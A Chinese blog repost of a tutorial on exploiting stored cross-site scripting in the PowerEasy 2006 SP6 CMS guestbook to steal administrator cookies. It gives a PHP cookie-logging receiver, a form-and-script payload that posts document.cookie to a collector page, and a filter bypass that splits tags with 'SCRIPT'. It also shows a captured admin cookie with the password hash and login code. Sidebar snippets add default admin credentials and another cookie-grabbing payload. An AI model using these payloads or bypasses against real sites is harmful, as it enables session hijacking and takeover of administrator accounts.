动易2006_SP6最新漏洞得到管理员密码(转)

最新推荐文章于 2024-04-22 15:08:24 发布
最新推荐文章于 2024-04-22 15:08:24 发布
阅读量3.6k 收藏
点赞数
分类专栏: 技巧文摘 文章标签: cookies input 数据库 测试 url date
动易2006_SP6最新漏洞得到管理员密码(转)
雕牌注:其实这个消息跨站很早我就测试过了,也成功,只是动易比较特须没能利用成功,此文还不错,转来学习学习。
鬼仔注:从7j那里看到的,并且有7j写的接收页面。

7j:没有找到他说的接收页面,只有自已用PHP写个了
<?
$filename = date("Ymd").".txt";
$time = @date("Y年m月d号H点i分s秒",time());
$cookie = $_POST['cookie'];
$url = $_POST['url'];
$hostname = $_POST['hostname'];
if ($cookie <> ""){
$tmp = fopen($filename,"a+");
fwrite($tmp,"地址:".$url."/n主机:".$hostname."/nCookie:".$cookie."/nIP:".$_SERVER['REMOTE_ADDR']."/n".$time."/n");
fclose($tmp);
}
?>

来源:′失眠ヤ夜 's blog

漏洞主要出现在“雁过留声(留言板)”、“信息管理”和“短消息”里,这里以留言板为例
下面我们来测试一下漏洞
打开留言板,选择源代码模式签写留言
审核发表状态下钓到管理员Cookies的几率比较到
我们先来试试一些文字
输入<>未被过滤
输入<script>过滤成<>,不好意思 刚才弄错了
输入scrSCRIPTipt会过滤成script(去掉了中间的大写SCRIPT)
看 漏洞出来了
也就是说它会把"Script"字符过滤掉,但是只过滤一次,给了我们可乘之机
(iframe标签你可以自己测试)
下面是一个获得Cookies的代码,会把Cookies提交到 http://localhost/cookies/cookies.asp,相关的代码我会打包到教程里
<form name=redir action=http://localhost/cookies/cookie.asp method=post>
<input type=hidden name=cookie>
<input type=hidden name=url>
<input type=hidden name=hostname>
</form>
<script>redir.cookie.value=document.cookie;redir.url.value=location.href;redir.hostname.value=location.hostname;redir.submit();</script>
现在我们在一些可能的敏感字符中插入SCRIPT字符,以防我们的代码被过滤
更改后的代码如下:
<FOSCRIPTRM naSCRIPTme=redSCRIPTir actSCRIPTion=http://locaSCRIPTlhost/cooSCRIPTkies/cooSCRIPTkie.asp>
<input type=hidSCRIPTden name=coSCRIPTokie>
<input type=hidSCRIPTden name=uSCRIPTrl>
<input type=hidSCRIPTden name=hoSCRIPTstname>
</forSCRIPTm>
<scrSCRIPTipt>rSCRIPTedir.cooSCRIPTkie.valSCRIPTue=docSCRIPTument.coSCRIPTokie;redSCRIPTir.urSCRIPTl.vaSCRIPTlue=locSCRIPTation.hrSCRIPTef;redSCRIPTir.hostnamSCRIPTe.vaSCRIPTlue=locatiSCRIPTon.hostnSCRIPTame;redSCRIPTir.subSCRIPTmit();</scrSCRIPTipt>
现在我们发表留言

看 数据库里的代码是我们修改前的代码
现在以管理员身份登录
现在我们保存cookies的数据库是空的
这是我发送的钓Cookies的网页

好的,现在代码已经执行,管理员的Cookies已经被我们钓到了
我们来看一下
ASPSESSIONIDQCRQQSAT=LCNFLHOBLBPHEJJMHJDPDMGF; localhostpowereasy=LastPassword=4P263W7JiD425kyd&UserName=admin&AdminLoginCode=PowerEasy2006&AdminName=admin&UserPassword=469e80d32c0559f8&RndPassword=4P263W7JiD425kyd&AdminPassword=469e80d32c0559f8
怎么样?得到了吧?
里面有管理员的用户名、密码,和管理认证码

信息管理和短消息也可以如法炮制,具体方法我就不多说了
在这里说一下 拿到源码后先要修改一下设置,conn.asp里的数据库路径要改一下
还有test.htm里的URL也要改一下,可以用它做测试 .


 
rjgcwl
关注
专栏目录
动易网站管理系统2006 Beta1
01-21
系统安装步骤: 1、安装IIS。 2、安装动易组件 3、双击PowerEasy2006.exe,按照提示一步步操作,完成动易系统文件的解压缩。 4、修改conn.asp文件中的数据库参数。 5、运行install.asp。 6、后台管理帐号:admin  密码:admin888
第十八天:WEB攻防-ASP安全&MDB下载植入&IIS短文件名&写权限&解析
m0_51322401的博客
01-06 775
找到之后为输入他的路径http://192.168.106.132/database/powereasy2006.mdb便可下载他的数据库文件。然后我们可以进入http://192.168.106.132/admin/Admin_Login.asp,也就是后台管理,便可操作他的数据库。当数据库文件是 mdb格式文件时,可以直接访问数据库文件,然后本地就会下载该数据库,使用数据库工具打开即可获得所有数据库信息。在后台文件中有一个这个数据,即为他的数据库文件。-asp程序的数据库下载植入。
安全渗透学习小结
wnma3mz的博客
10-17 6335
安全渗透学习小结 本文用以记录学习过的一些安全渗透知识。 Google Hacker 参考文章:google hacker inurl: 用于搜索网页上包含的URL. 这个语法对寻找网页上的搜索,帮助之类的很有用. intext: 只搜索网页部分中包含的文字(也就是忽略了标题,URL等的文字). site: 可以限制你搜索范围的域名. filetype: 搜索文件的后缀或者扩展名 intitle:...
动易html在线编辑器 漏洞,动易网站管理系统vote.asp页面存在SQL注入漏洞
weixin_39553904的博客
05-30 1039
动易网站管理系统vote.asp页面存在SQL注入漏洞测试系统:动易(PowerEasy CMS SP6 071030以下版本)安全综述:动易网站管理系统是一个采用 ASP 和 MSSQL 等其他多种数据库构建的高效网站内容管理解决方案产品。漏洞描述:vote.asp调用了动易组件PE_Site.ShowVote,此组件VoteOption参数过滤不严,导致可以进行mssql注入但是其语句里面过滤...
动易安全开发手册 完整版
TOMMY201112的博客
08-20 696
动易安全开发手册 目录 一、输入验证3 1.什么是输入3 2.输入验证的必要性3 3.输入验证技术3 3.1 主要防御方式3 3.2 辅助防御方式5 二、输出编码8 1.输出的种类8 2.输出编码的必要性8 3....
动易组件2006 PowerEasy2006_SP6_DLL 32位、64位 手动安装包
03-12
动易组件2006 PowerEasy2006_SP6_DLL:手动安装与系统兼容性的探讨》 动易组件2006是一款在IT行业中广泛使用的开发工具,其PowerEasy2006_SP6_DLL是该组件的一个重要版本,为开发者提供了丰富的功能和服务。这个...
PowerEasy2006_SP6_DLL动易2006最新组件
10-14
标题中的“PowerEasy2006_SP6_DLL”指的是动易公司的一款名为PowerEasy的网站管理系统在2006年发布的Service Pack 6版本的动态链接库(DLL)文件。DLL是Windows操作系统中的一种共享库机制,它允许多个程序同时使用...
重置动易(SiteWeaver 6.5)的管理员密码的代码
09-30
本篇将详细介绍如何通过代码重置动易SiteWeaver 6.5的管理员密码,以及需要注意的安全事项。 首先,我们来看一下提供的代码。这段VBScript代码的作用是在线重置管理员(假设为admin)的密码。代码中包含了以下关键...
完美动易2006 SW6.5PHPCMS 2007 SP6.rar
08-30
完美动易2006 Sp6 SiteWeaver CMS6.5 Access MSSQL PHPCMS 2007 SP6 程序 Bulid 2008-4-26 2008-4-27修正两处错误: 1、友情链接不能换的问题 2、增加了开始时间和结束时间,大家可以算算N万数据需要多少时间...
动易2006sp6完整版组件
04-24
在“压缩包子文件的文件名称列表”中提到了“PowerEasy2006_SP6_DLL”,这可能是一个包含了所有必需DLL文件的子文件夹或者一个单独的压缩文件,专门用于补充或更新原有的动易2006sp6组件。用户需要将这个文件或...
动易开源PowerEasy@SiteWeaver CMS6.5
03-22
PowerEasy?SiteWeaver?6.5版是完全开源的!并且PowerEasy?SiteWeaver?CMS6.5版和PowerEasy?SiteWeaver?eShop6.5版二个子产品将完全免费提供给个人非商业使用!用户可免费下载、免费使用、免费升级,无使用时间与功能限制。 PowerEasy?SiteWeaver?6.5版同时提供了ACCESS数据库和MSSQL数据库。无论您是商业用户还是免费用户,都可以根据自己的需要选择简单易用的ACCESS数据库还是高性能的MSSQL数据库。 所有动易2006的用户都可以免费升级到PowerEasy?SiteWeaver?6.5版。压缩包中已经提供了相应的升级程序和升级说明。升级过程将是非常简单的。 把“源代码”文件夹的所有文件上传到你的服务器上,然后运行 http://你的网址/Install.asp 进行安装。 如果您在安装或使用过程中遇到任何问题,请到动易帮助中心(http://help.powereasy.net)查看解决方法。动易帮助中心为您提供了最全面的关于动易产品的知识文档。 从2006版升级的操作步骤: 第一步、备份好当前正在运行动易2006版的网站的Conn.asp和Config.asp。 第二步、将“源代码”中的所有文件复制到当前网站中,覆盖原来的文件。 第三步、根据原来Conn.asp和Config.asp中的设置,修改新Conn.asp和Config.asp中的设置。 第四步、按照“升级及换程序\动易2006ToSiteWeaver6.5数据库升级程序”中的说明将2006版的数据库升级好。 第五步、登录后台,进入“系统设置--频道管理”,更新所有频道文件。 第六步、进入“系统设置--网站风格管理”,刷新风格CSS文件。 第七步、进入各频道的栏目管理,刷新栏目JS。 第八步、如果启用了商城,还需要进入“系统设置--在线支付平台管理”,设置在线支付平台的相应参数。 PowerEasySiteWeaver6.5相对于动易2006的功能更新说明: ●代码结构完全重新设计和优化,由原来的调用组件方式改成适用常规ASP程序的文件包含及过程调用方式。 ●优化了一些代码和算法,使得性能提升了30%,生成速度提升了50%,资源占用减少了50%。在特别情况下更是提升了几倍不止(如“生成所有未生成的文章”功能)。 ●经过BCT的审计,修复了不少动易2006版中存在的漏洞。为了安全,大家一定要升级到这个版本! ●改进了生成HTML的方式,将原来的“快速生成”和“慢速生成”相结合为新的生成方式。新的生成方式采用每页生成指定数量的HTML页方式,这种方式即具有原来“快速生成”的速度优点,又避免了原来“快速生成”方式在单个页面内生成所有HTML页会极大占用CPU和内存的缺点。 ●改进了生成JS方式,将原来的发表文章时自动更新JS文件但不显示任何信息的方式改为与自动生成HTML类似的方式。 ●新增支付平台管理功能,前台增加提供多个在线支付平台供用户选择的功能
PowerEasy_2006
09-08
PowerEasy_2006下载
动易CMS漏洞收集
08-01 1895
动易SiteWeaver6.8短消息0day跨站漏洞 user用户登陆,默认账号密码 admin/admin888 短消息代码模式下编辑,预览 <imgsrc="../Skin/blue/powerease_logo.gif"onload="resizepic(this);functionresizepic(){alert(document.cookie)};"&...
SQL防注入功能原理相关知识
ASP和PHP工作经验
03-12 1450
SQL防注入功能原理相关知识 作者:夜狼    文章来源:动易论坛    点击数:36    更新时间:2008-3-12         SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐
动易CMS2006安装与配置
gsls200808的专栏
04-27 4492
本文用到的软件 win2003r2企业版:http://www.itellyou.cn/ Office2000(可选):http://lib.ujs.edu.cn/oldweb/download/software/office/office2000.zip 动易CMS2006:http://down.tech.sina.com.cn/page/15389.html winrar5.31:h
动易漏洞
asp经验积累
02-16 9864
动易漏洞动易网站管理系统是当前中国最具性价比、最受欢迎的CMS系统和电子商务系统,目前已有超过10万个以上网站的应用规模,拥有政府、企业、科研教育和媒体等各个行业领域的几千名商业用户。其中的Region.asp的Province = Trim(Request.QueryString("Province"))语句没经过过滤的,我们可以利用构造我们的SQL语句,进行注入。总是用工具注入,水平也不会提高
WEB攻防-ASP安全-MDB下载
最新发布
weixin_45534587的博客
04-22 1201
当Web站点提供文件下载功能时,如果没有对下载请求进行充分的验证和过滤,或者服务器配置不当,就可能产生文件下载漏洞。攻击者可以利用这个漏洞,通过修改请求参数或尝试猜测或遍历服务器上的文件路径,从而绕过正常的访问控制,下载到不应该被访问到的文件,包括数据库文件(如MDB文件)。打开后台目录192.168.10.133/Admin/Admin_Index.asp报错问题是常规配置错误,需要在属性-->主目录-->配置-->选项下勾选启动父路径。选择网站-->默认网站-->右键-->打开。
动易Powereasy 2006 SP6升级至PowerEasy_SiterWeaver_CMS6.8 ACCESS版本纪录
weixin_30549175的博客
11-28 372
动易Powereasy 2006 SP6升级至PowerEasy_SiterWeaver_CMS6.8 ACCESS版本纪录2009-12-01 10:46(我才在本机升级成功,动易客服就联系我说这个版本要收费。不晓得真的假的。郁闷) 第一步、备份    先把网站文件备份到本机,主要是程序代码,一些上传的图片如Uploadfiles或视频、软件等就不需要备份。关键备份文件:conf...
动易忘记管理员密码
weixin_33827590的博客
04-10 983
问题一:2006管理员密码忘记或被意外修改了如何恢复?解决:469e80d32c0559f8 把这段字符填入PE_Admin表超级管理员记录中的Password字段中。在后台用超级管理员登陆,密码是 admin888。 问题二:SiteFactory™1.2版 用户名和密码忘记怎么恢复?解决:打开数据库,在PE_Admin表里面里面查看用户名,password 字段里面改为...
SiteWeaver内容管理系统:动易2006版版式模板详细管理指南
"SiteWeaver内容管理系统之动易2006版版式模板管理教程" SiteWeaver内容管理系统是...无论是对于新手还是经验丰富的网站管理员动易2006版的版式模板管理都是一个强大且易于上手的工具,能够满足各种复杂的设计需求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值